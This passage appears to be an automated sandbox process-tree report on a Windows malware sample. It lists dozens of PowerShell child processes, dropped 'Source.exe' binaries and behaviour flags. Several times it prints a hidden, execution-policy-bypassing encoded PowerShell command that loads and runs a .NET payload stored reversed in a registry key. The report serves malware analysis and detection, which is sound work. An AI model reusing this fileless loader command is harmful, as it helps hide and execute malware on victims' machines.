- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1896
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5248
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:744
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3656
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1924
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2264
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4948
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4148
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2648
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2696
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3156
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4776
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1044
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1112
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:4268
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5352
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2668
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3104
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2664
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3916
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3420
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4040
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4488
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5956
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:3912
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2276
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2592
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2864
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3668
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5648
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2076
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1820
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5132
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6036

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5992
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:2260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:1548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1144
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5312
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5072
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3836
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5444
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3172
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4452
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5668

C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3504
- C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  C:\Users\Admin\AppData\Local\Items\ushiwk\Source.exe
  2⤵
  - Executes dropped EXE
  PID:5180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:4256
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3708
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3316
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4520
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4916
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4116
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:6028
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4756
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6092
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5136
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5172
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4528
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2116
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5812
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5188

C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4028
- C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  C:\Users\Admin\AppData\Roaming\HasVarArgs\Source.exe
  2⤵
  - Executes dropped EXE
  PID:1820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:984
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1288
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2296
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:752
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3504
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1528
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:5200
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2360
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3624
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5388
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5852
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1456
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3676
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:3396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:6040
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3092
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3684
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5180
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1204
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3444
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3448
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2068
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:3308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAawBkAGIAYQBmAFwAKQAuAGYAYQBrAGEAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=
1⤵
- Blocklisted process makes network request
PID:4948
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5884
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:5468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4632
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2060
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:1192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:2492
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  2⤵
  PID:4876
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
